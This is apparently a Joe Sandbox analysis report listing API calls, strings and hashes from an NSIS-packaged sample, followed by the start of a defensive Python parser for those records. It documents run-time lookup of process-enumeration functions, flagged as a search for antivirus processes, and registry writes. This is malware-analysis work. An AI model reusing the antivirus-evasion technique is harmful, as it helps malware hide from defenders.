                                                          • Instruction Fuzzy Hash: 7BC0223810020092E1242F34AE0EB063A04F740330F500B3EF0F2F02F0D73C8640006D
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                          • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                          • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                          • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                          • DeleteObject.GDI32(?), ref: 00404A79
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                          • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                          • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                          • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                          • ShowWindow.USER32(00000000), ref: 00404F5B
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $ @$M$N
                                                          • API String ID: 1638840714-3479655940
                                                          • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                          • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                          • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                          • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                          • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                          • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                          • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                          • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                          • SetWindowTextW.USER32(?,?), ref: 00404583
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                          • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                          • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                            • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                            • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                          • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                          • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                          Similarity
                                                          • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                          • String ID: 82D$@%F$@rD$A
                                                          • API String ID: 3347642858-1086125096
                                                          • Opcode ID: ae95d19a650443c120af7248ec578161461b31874b4e5badf60a47e74a1ad680
                                                          • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                          • Opcode Fuzzy Hash: ae95d19a650443c120af7248ec578161461b31874b4e5badf60a47e74a1ad680
                                                          • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                          • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                          • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                          • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                          • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                          • CloseHandle.KERNEL32(?), ref: 004071E6
                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                          Similarity
                                                          • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                          • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                          • API String ID: 1916479912-1189179171
                                                          • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                          • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                          • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                          • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                          APIs
                                                          • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                          • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                          • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                          • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                          • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                          • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                          • FindClose.KERNEL32(?), ref: 00406E33
                                                          Strings
                                                          • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                          • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                          • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                          • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                          • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                          • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                          • \*.*, xrefs: 00406D03
                                                          • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                          • API String ID: 2035342205-3294556389
                                                          • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                          • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                          • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                          • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                          APIs
                                                          • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                          • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                          • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                          • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                          • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                          Similarity
                                                          • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                          • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 3581403547-784952888
                                                          • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                          • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                          • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                          • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                          APIs
                                                          • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                          Strings
                                                          • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                          Similarity
                                                          • API ID: CreateInstance
                                                          • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                          • API String ID: 542301482-1377821865
                                                          • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                          • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                          • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                          • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                          • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                          • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                          • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                          • lstrlenW.KERNEL32(?), ref: 004063CC
                                                          • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                            • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                          • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                          • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                          • GlobalFree.KERNEL32(?), ref: 004064DD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                          • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                          • API String ID: 20674999-2124804629
                                                          • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                          • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                          • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                          • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                          APIs
                                                          • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                          • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                          • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                          • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                          • wsprintfA.USER32 ref: 00406B4D
                                                          • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                          • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                          • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                          • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                          • String ID: F$%s=%s$NUL$[Rename]
                                                          • API String ID: 565278875-1653569448
                                                          • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                          • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                          • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                          • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                          • DeleteObject.GDI32(?), ref: 004010F6
                                                          • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                          • SelectObject.GDI32(00000000,?), ref: 00401149
                                                          • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                          • DeleteObject.GDI32(?), ref: 0040116E
                                                          • EndPaint.USER32(?,?), ref: 00401177
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                          • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                          • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                          • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                          APIs
                                                          • RegCreateKeyExW.ADVAPI32 ref: 004028DA
                                                          • lstrlenW.KERNEL32(004130D8,00000023), ref: 004028FD
                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?), ref: 004029BC
                                                          • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                          Strings
                                                          • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                          • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                          • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                          • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                          • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                          • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CloseCreateValuewvsprintf
                                                          • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                          • API String ID: 1641139501-220328614
                                                          • Opcode ID: 851f9ae02ebf16e617d7dc7c261c2c3ae114e343f87d589352c7bd3343235263
                                                          • Instruction ID: 4333191c585e2ccbf31537ec3fe99400e108362b2ae8da956978e4ec321c2a22
                                                          • Opcode Fuzzy Hash: 851f9ae02ebf16e617d7dc7c261c2c3ae114e343f87d589352c7bd3343235263
                                                          • Instruction Fuzzy Hash: 59319AB2E00208BFDF22AF91CE4699EBF76EB04714F10407BF505701A1D6794B60AB99
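                                                          The two function records above are the ones an analyst most wants to reason about programmatically: the routine at 004063BF..004064DD resolves EnumProcesses, EnumProcessModules and GetModuleBaseNameW from PSAPI.DLL at run time (the Similarity strings also list the CreateToolhelp32Snapshot/Process32FirstW/Module32FirstW fallback), which is what the "Search for Antivirus process" signature keys on, and the routine at 004028DA..004029E4 carries the WriteRegStr/WriteRegDWORD/WriteRegBin log strings. The helper below is an added analyst script, not part of the Joe Sandbox report and not code from the sample: it parses the bullet formats shown on this page (`Name.Module(args), ref: ADDR` and `text, xrefs: ADDR`, with the "Part of subcall function" prefix), rebuilds the call sequence and flags dynamic API resolution, process enumeration and registry writes. Two assumptions are labelled in the code: the sandbox prints the module handle passed to GetProcAddress as 00000000, so exports are paired with the most recent LoadLibrary call by order rather than by handle, and argument lists are split on commas, which the API bullets on this page permit. One caveat worth keeping in mind when reading the flags: the WriteReg*/CreateShortCut/RMDir format strings are the log strings of the NSIS installer runtime, so these API patterns come from the installer stub shared by every NSIS package and describe what the stub can do, not what this particular package's script does.

```python
"""Parse the per-function "APIs" / "Strings" bullets of a Joe Sandbox report.

Added analyst helper (not part of the report or the sample). The sample inputs
are the bullet lines copied from the two function records on this page.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed input: the "APIs" bullets of the PSAPI-resolving routine (ref 004063BF..004064DD).
PSAPI_RECORD = r"""
• GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
• lstrlenW.KERNEL32(?), ref: 004063CC
• GetVersionExW.KERNEL32(?), ref: 0040642A
  • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
• LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
• FreeLibrary.KERNEL32(00000000), ref: 004064D4
• GlobalFree.KERNEL32(?), ref: 004064DD
"""

# Constructed input: the "APIs" and "Strings" bullets of the WriteReg routine (ref 004028DA..004029E4).
WRITEREG_RECORD = r"""
• RegCreateKeyExW.ADVAPI32 ref: 004028DA
• lstrlenW.KERNEL32(004130D8,00000023), ref: 004028FD
• RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?), ref: 004029BC
• RegCloseKey.ADVAPI32(?), ref: 004029E4
• WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
• WriteReg: error creating key "%s\%s", xrefs: 004029F5
• WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
• WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
• WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
• WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
"""

# "Name.Module(args), ref: ADDR"; the parenthesised arguments and the comma are optional
# (compare "RegCreateKeyExW.ADVAPI32 ref: 004028DA").
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
# "text, xrefs: ADDR" from the Strings section.
STR_RE = re.compile(r"^\s*•\s*(?P<text>.*?),\s*xrefs:\s*(?P<xref>[0-9A-F]{8})\s*$")
# Arguments the sandbox could not resolve to a string: a raw address, a negative offset, or "?".
POINTER_RE = re.compile(r"^(?:-?[0-9A-F]{8}|\?|)$")

LOADLIBRARY = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}
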